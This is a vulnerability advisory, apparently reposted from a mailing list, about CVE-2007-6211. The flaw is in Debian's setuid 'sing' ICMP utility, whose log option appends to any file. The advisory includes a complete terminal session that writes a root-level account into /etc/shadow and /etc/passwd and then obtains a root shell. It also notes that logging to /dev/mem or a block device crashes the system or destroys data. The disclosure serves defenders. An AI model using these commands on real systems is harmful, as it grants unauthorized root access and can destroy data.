sing (debian) vunlerability

2007.12.04
Credit: Milen Rangelov
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2007-6211
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Hello, The sing utility (Send Nasty ICMP Garbage) is a ping replacement that allows sending ICMP packets with spoofed source and custom ICMP types/codes (http://sourceforge.net/projects/sing). The debian package provides sing as a suid binary (actually, the sid distribution asks the user whether he'd like it installed suid, I'm not 100% sure, but in etch, it installs it suid, anyway, should check). The sing program has the "-L" option to log its output into a log file. Due to lack of file ownership checking, any file could be overwriten (more precisely - appended) with its log output. I tried to play with making the output usable for some privileges escalation purposes, but failed initially (sing escapes some bad input, ehm). However, it's still possible for any user to crash the system or destroy block devices' data (provided that the binary is installed SUID of course). Exploiting that is trivial, just give /dev/mem or any block device as a log file. However, later on, I decided to try it again to gain root privileges and it occured to be quite trivial. Here is an example session: gat3way@gat3way:~$ cat hah hack:x:0:0:/tmp:/bin/sh n gat3way@gat3way:~$ cat hah1 hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7::: n gat3way@gat3way:~$ grep hack /etc/passwd gat3way@gat3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`" SINGing to localhost (127.0.0.1): 78 data bytes 78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms --- localhost sing statistics --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.073/0.073/0.073 ms gat3way@gat3way:~$ sing -L /etc/passwd localhost -p "`cat hah`" SINGing to localhost (127.0.0.1): 43 data bytes 43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms --- localhost sing statistics --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.083/0.083/0.083 ms gat3way@gat3way:~$ grep hack /etc/passwd hack:x:0:0:/tmp:/bin/sh gat3way@gat3way:~$ ssh hack@localhost hack@localhost's password: .. root@gat3way:~# id uid=0(root) gid=0(root) groups=0(root) root@gat3way:~# After all, that's not a huge problem, cause quite a few users install sing AFAIK. But it's a very easily exploited vulnerability OTOH and leads to a superuser privillege escalation, system crash or destroying data. Regards, Milen Rangelov P.S sorry if that mail is duplicated, I had some problems with my mail server and had to resend that mail.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top